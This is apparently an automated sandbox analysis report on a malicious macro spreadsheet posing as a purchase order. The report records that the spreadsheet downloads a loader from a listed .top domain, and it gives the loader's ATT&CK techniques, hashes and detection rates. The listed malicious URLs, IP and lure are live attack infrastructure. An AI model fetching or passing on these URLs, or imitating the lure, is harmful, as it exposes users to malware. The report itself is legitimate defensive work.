Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00440C62 GetProcessHeap,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429B5B SetUnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429778 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042DBDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005399C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429B5B SetUnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429778 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0042DBDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_005399C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429BB0 cpuid
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_00429BB0 cpuid
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GlobalAlloc,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GlobalAlloc,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: EnumSystemLocalesW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: GetLocaleInfoW,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043B539 GetSystemTimeAsFileTime,
Source: C:\ETTER\dAneDFma\conhost.exeCode function: 3_2_0043B539 GetSystemTimeAsFileTime,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter2Application Shimming1Process Injection1Masquerading11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting11Boot or Logon Initialization ScriptsApplication Shimming1Disable or Modify Tools1LSASS MemorySecurity Software Discovery24Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution43Logon Script (Windows)Extra Window Memory Injection1Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery24SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting11Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PURCHASE ORDER No-17-11-98543.xlsm9%VirustotalBrowse
PURCHASE ORDER No-17-11-98543.xlsm6%ReversingLabsDocument-Office.Downloader.SLoad

Dropped Files

SourceDetectionScannerLabelLink
C:\ETTER\dAneDFma\conhost.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader100%Joe Sandbox ML
C:\ETTER\dAneDFma\conhost.exe29%VirustotalBrowse
C:\ETTER\dAneDFma\conhost.exe23%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader23%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
gvbmkhvnyib.top6%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader7%VirustotalBrowse
http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader0%Avira URL Cloudsafe
http://4cnx9s25gsvw.top/syZsNnTNps.vx0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
gvbmkhvnyib.top
193.106.175.25
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloadertrue
  • 7%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://4cnx9s25gsvw.top/syZsNnTNps.vxconhost.exefalse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
193.106.175.25
unknownRussian Federation
50465IQHOSTRUtrue

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:319311
Start date:18.11.2020
Start time:07:56:19
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 59s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:PURCHASE ORDER No-17-11-98543.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.expl.evad.winXLSM@3/10@1/1
EGA Information:Failed
HDC Information:
  • Successful, ratio: 4.2% (good quality ratio 4.1%)
  • Quality average: 74.4%
  • Quality standard deviation: 19.8%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
  • TCP Packets have been reduced to 100

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
IQHOSTRUVSL- DOCSVtLthwicBDYP6rk- xlsx.exeGet hashmaliciousBrowse
  • 193.106.175.134
COS1102213211.exeGet hashmaliciousBrowse
  • 193.106.175.134
ZT3146457.exeGet hashmaliciousBrowse
  • 193.106.175.134
PO.W424676.exeGet hashmaliciousBrowse
  • 193.106.175.134
KYOCERA.pdf.exeGet hashmaliciousBrowse
  • 193.106.175.134
1pGk0WbLBY.exeGet hashmaliciousBrowse
  • 193.106.175.47
Invoice.exeGet hashmaliciousBrowse
  • 193.106.175.47
remittance confirmation.xlsxGet hashmaliciousBrowse
  • 193.106.175.47
Quotation Complete Overhaul of Main Engine Niigata.exeGet hashmaliciousBrowse
  • 193.106.175.47
fHKvj3Yr9U.exeGet hashmaliciousBrowse
  • 193.106.175.47
Bmxcixs_Signed_.exeGet hashmaliciousBrowse
  • 193.106.175.47
Original Invoice-COAU7226107650.xlsxGet hashmaliciousBrowse
  • 193.106.175.47
yO07G0lvTRQkenm.exeGet hashmaliciousBrowse
  • 193.106.175.47
Mg3eGjc18X.exeGet hashmaliciousBrowse
  • 193.106.175.47
shipment_terms.xlsxGet hashmaliciousBrowse
  • 193.106.175.47
Bank Details.doc.exeGet hashmaliciousBrowse
  • 193.106.175.47
6236463D8973.pdf.exeGet hashmaliciousBrowse
  • 193.106.175.47
SDT_R224e18032356210_XLS.exeGet hashmaliciousBrowse
  • 193.106.175.47
0KtzKZlkMHhoTcu.exeGet hashmaliciousBrowse
  • 193.106.175.47
eWuKwajjuP.exeGet hashmaliciousBrowse
  • 193.106.175.47

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ETTER\dAneDFma\conhost.exe
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):297472
Entropy (8bit):7.789180781231072
Encrypted:false
SSDEEP:6144:niLXVcyDs4gQBOJVnl5EIoAxI2ioM+pQDCuaN9T3y3Dw6hjNScK:niLXVKJ93cuYWdT3yzppM1
MD5:F5ECCDDC7EE3DF74B79DF21D04DD56A1
SHA1:5E464AEF69763C3FC25BCEADFD8FFF32A405D849
SHA-256:D893D3B0E8C2FA238A84EEEC1ADB6DEC0853828D314873BE41EE74280541B6D0
SHA-512:10023265D4AAB08D6CED1B32554754BFA3ED1941F6F92ECB21457CB73AFFBA0FAA8C115E2E2B56ECE9EAAEDB04D82C9EFFDEE65BDE1FF328A8FEB276F9F41578
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: Virustotal, Detection: 29%, Browse
  • Antivirus: ReversingLabs, Detection: 23%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............rh..rh..rh.. ...rh.. ...rh.. ..rh.....rh..ri.rh.. ...rh.. ...rh.. ...rh.Rich.rh.................PE..L.....P^.................$...................@....@........................................................................,Y..<........&..................................................0U.......T..@............@...............................text...U#.......$.................. ..`.rdata..0"...@...$...(..............@..@.data...XJ...p.......L..............@....tls.................`..............@....rsrc....&.......(...b..............@..@................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:downloaded
Size (bytes):297472
Entropy (8bit):7.789180781231072
Encrypted:false
SSDEEP:6144:niLXVcyDs4gQBOJVnl5EIoAxI2ioM+pQDCuaN9T3y3Dw6hjNScK:niLXVKJ93cuYWdT3yzppM1
MD5:F5ECCDDC7EE3DF74B79DF21D04DD56A1
SHA1:5E464AEF69763C3FC25BCEADFD8FFF32A405D849
SHA-256:D893D3B0E8C2FA238A84EEEC1ADB6DEC0853828D314873BE41EE74280541B6D0
SHA-512:10023265D4AAB08D6CED1B32554754BFA3ED1941F6F92ECB21457CB73AFFBA0FAA8C115E2E2B56ECE9EAAEDB04D82C9EFFDEE65BDE1FF328A8FEB276F9F41578
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 23%
Reputation:low
IE Cache URL:http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............rh..rh..rh.. ...rh.. ...rh.. ..rh.....rh..ri.rh.. ...rh.. ...rh.. ...rh.Rich.rh.................PE..L.....P^.................$...................@....@........................................................................,Y..<........&..................................................0U.......T..@............@...............................text...U#.......$.................. ..`.rdata..0"...@...$...(..............@..@.data...XJ...p.......L..............@....tls.................`..............@....rsrc....&.......(...b..............@..@................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71A94C24.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 9 x 6, 8-bit colormap, interlaced
Category:dropped
Size (bytes):152
Entropy (8bit):4.902652329045401
Encrypted:false
SSDEEP:3:yionv//thPlzlZRMlp8Lts7CX9/rIREYY2jm6Kpgsyx9yGlvH1p:6v/lhPxpkp8R/BI02j+Odyi9p
MD5:A2C42F13DD6F6D98613D78C954D8E958
SHA1:5D6EA91767736E71BB225D9408A21634E959C0EA
SHA-256:CBA123392EDFD088C8A34FF7DEDFDDD581712E1EC70A30B24E95EBF037C29625
SHA-512:18F11A9EE85D9EAB340FF27FC1FCEBB1F9F0C945AF110364CE93634251E8EFC07A325F24572B42C2EA12EB60195FD94C70F7644C2698DE4BE70C49AC82B318BF
Malicious:false
Reputation:low
Preview: .PNG........IHDR.............Q.ta....sRGB.........gAMA......a.....PLTE......U..~....tRNS...0J....pHYs..........o.d....IDAT.Wc..00...B.....@....IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A97335D5.jpg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 2806x1984, frames 3
Category:dropped
Size (bytes):157646
Entropy (8bit):7.675046596886803
Encrypted:false
SSDEEP:3072:5G+FN/z4Oy7iR7Dzg8r/vQWtcGu9SovWBGv8ue+fFPrVPSA7QAp0JOs:51huWtcGWSoyGEAfFgCOEs
MD5:EB37A7A3F548D1174FD2B0A4255B4843
SHA1:4BB5CA34A1760676800497D3FE65C4A3596BB383
SHA-256:1EC71CD6171D14F9BC6DA014D98E41AD5117A9CC70C8D921365FB65221F79C53
SHA-512:87E29834910DD24ED489DF640689BB2B7E9729FFF33A3CC84295E4CF06F0A0AA0536939C019EC381D5DC5E2C530641E14357195BBCB06010F9D3D0CE8D5ED0D2
Malicious:false
Reputation:low
Preview: ......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................Wp..O.UmK...........................................MAK.^.............................................L..W..i.a!................................................j./......#..e..........................................*-b./.P..M....................................._".'$.L_@....).Rm.....+...6.\. ....................................0....W.....{.6&.{..@4..........
C:\Users\user\AppData\Local\Temp\68FE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):402957
Entropy (8bit):7.779201075265673
Encrypted:false
SSDEEP:3072:lKvrVXAx/8mQKPVOmvmpmImonVRQMVG+FN/z4Oy7iR7Dzg8r/vQWtcGu9SovWBGt:l+mvmpmImMD1huWtcGWSoyGEAfFgCOEl
MD5:CE344653150155D9D547D42876AA35A5
SHA1:BACD23941EAE898AF6A1BDB30A020BF88747B033
SHA-256:1EAC165A5F9B3BBDC709205335875FBCF2E6ED4C0E78E41B5B41C21A45550722
SHA-512:FCDEE4A12FBEB7EE38E41C646D524590E43407A95943F9D5EB5C98D3C897AFEBBDFEEF92F8A428D4CCBF7C2EB212E5E170CFCB6612260AC9C2BB7EBD0D2769F7
Malicious:false
Reputation:low
Preview: .U.N#1....?.|E3. ..*..<...|@cw2&~.m .{l'dI..F q.......lft.....-;j..B+.Tv...../.(............~.....F..s.....y.ig...a.=.)L.....\8...:..l4..1<.X]...B...V./.e..)..y.oE........7.b.z..I.r.:..0...!.k.H.9..o....I..Jbu.!^.If.L.W....M.....g.uC.bl....-<jL{...L.I....@.^...J.t...6...,..n..2....t...M....=....n-...~.K.=.).5...]....A@y.C.o?..c.=:d..,./....2...t;o...o....o..]...CT.j..z.15....=... Qn...5.........PK..........!.L.L.............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Nov 18 14:56:49 2020, atime=Wed Nov 18 14:56:49 2020, length=16384, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.4779282422579785
Encrypted:false
SSDEEP:12:85QVJLgXg/XAlCPCHaXtB8XzB/UUkh/vX+WnicvbhnbDtZ3YilMMEpxRljKBTdJU:85sj/XTd6jOhXYeNDv3qErNru/
MD5:163352799BFEEAA2E7ADF3EB03067A17
SHA1:4E8D4D20F4B0FA986BB362AB09FB984D5A2D0EBE
SHA-256:DFF13D9964198AD8BB1E83AAF26F4A882BCCAF8B1C355BA22130D163B294D416
SHA-512:AC5FDDB7A67E02A199BE8C67582028005E8D54CE08DF36D31BFC396C475814FFE868DD90C84E6B33FC4FB8B9C906B7508710EE384F005671CCCA3910A1C41A14
Malicious:false
Reputation:low
Preview: L..................F...........7G.....l......l....@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....rQ....Desktop.d......QK.XrQ..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\992547\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......992547..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PURCHASE ORDER No-17-11-98543.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Nov 18 14:56:49 2020, atime=Wed Nov 18 14:56:49 2020, length=402957, window=hide
Category:dropped
Size (bytes):4456
Entropy (8bit):4.579357809049034
Encrypted:false
SSDEEP:96:8O4/XojFkTyT/EQh2O4/XojFkTyT/EQh2O4/XojFkTyT/EQh2O4/XojFkTyT/EQ/:8yjFSQEyjFSQEyjFSQEyjFSQ/
MD5:B2D166D12A6637FE97494F0087A1FACF
SHA1:D94EEE9B0CA669F4BC739B752F4A703BA282BD13
SHA-256:8B4AA8F791979C5B7C2D9ED6275B6F9CB5086D3B63892799C626B4E123950B27
SHA-512:2356D8F8431A0DCD2B0FC528E35967CEBE96C301D2F0A701A4698E41FED40E14436459EC5911C1D29FB99CA4A01D557E682372FBDD5641810C21B97A2C2724C8
Malicious:false
Reputation:low
Preview: L..................F.... ........{.....l...|..l....&...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....rQ.. .PURCHA~1.XLS..r.......Q.y.Q.y*...8.....................P.U.R.C.H.A.S.E. .O.R.D.E.R. .N.o.-.1.7.-.1.1.-.9.8.5.4.3...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\992547\Users.user\Desktop\PURCHASE ORDER No-17-11-98543.xlsm.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.U.R.C.H.A.S.E. .O.R.D.E.R. .N.o.-.1.7.-.1.1.-.9.8.5.4.3...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):306
Entropy (8bit):4.979468454503797
Encrypted:false
SSDEEP:6:dj+lgg3sTOUlgg3sTmlgg3sTOUlgg3sTmlgg3sTOUlgg3sTmlgg3sTq:dOgrTlgrTCgrTlgrTCgrTlgrTCgrTq
MD5:AA32031DB61362C7645F72B5CF99760F
SHA1:DB105CCA2EE4332E413D8BF63DB980BE0D2624C1
SHA-256:3992E9591EB0D63A33F27CDAE69B8C03518D89027A1FA1FC693BBED60E795D96
SHA-512:A59ADDEEDBA11A288BFCFC1047ABFEF0A98B10AA38EFC9C6B013C6B87FCEFEC202D652625619B14DC67E3D250DB572FBAE0B2818B9270E7C1476831D3D0AE251
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..PURCHASE ORDER No-17-11-98543.LNK=0..PURCHASE ORDER No-17-11-98543.LNK=0..[misc]..PURCHASE ORDER No-17-11-98543.LNK=0..PURCHASE ORDER No-17-11-98543.LNK=0..[misc]..PURCHASE ORDER No-17-11-98543.LNK=0..PURCHASE ORDER No-17-11-98543.LNK=0..[misc]..PURCHASE ORDER No-17-11-98543.LNK=0..
C:\Users\user\Desktop\2AFE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):402957
Entropy (8bit):7.779201075265673
Encrypted:false
SSDEEP:3072:lKvrVXAx/8mQKPVOmvmpmImonVRQMVG+FN/z4Oy7iR7Dzg8r/vQWtcGu9SovWBGt:l+mvmpmImMD1huWtcGWSoyGEAfFgCOEl
MD5:CE344653150155D9D547D42876AA35A5
SHA1:BACD23941EAE898AF6A1BDB30A020BF88747B033
SHA-256:1EAC165A5F9B3BBDC709205335875FBCF2E6ED4C0E78E41B5B41C21A45550722
SHA-512:FCDEE4A12FBEB7EE38E41C646D524590E43407A95943F9D5EB5C98D3C897AFEBBDFEEF92F8A428D4CCBF7C2EB212E5E170CFCB6612260AC9C2BB7EBD0D2769F7
Malicious:false
Reputation:low
Preview: .U.N#1....?.|E3. ..*..<...|@cw2&~.m .{l'dI..F q.......lft.....-;j..B+.Tv...../.(............~.....F..s.....y.ig...a.=.)L.....\8...:..l4..1<.X]...B...V./.e..)..y.oE........7.b.z..I.r.:..0...!.k.H.9..o....I..Jbu.!^.If.L.W....M.....g.uC.bl....-<jL{...L.I....@.^...J.t...6...,..n..2....t...M....=....n-...~.K.=.).5...]....A@y.C.o?..c.=:d..,./....2...t;o...o....o..]...CT.j..z.15....=... Qn...5.........PK..........!.L.L.............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N
C:\Users\user\Desktop\~$PURCHASE ORDER No-17-11-98543.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):495
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fj/FFDJw2fV:vBFFGaFFGaFFGS
MD5:98D7F9B901C91608CD7EA5509662BBCA
SHA1:F166635CE572B615A1D80076A1AE8DE9220473CF
SHA-256:F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE
SHA-512:5536FD72C18081A1CFB46EB2E311BB257764C53B293E0D4B90F9C6C5EFB00E5A3A28190A2D04F3EE2819CF8DC7EBA7747DC8E8910C8716ACA7BAED0532142D1C
Malicious:true
Reputation:low
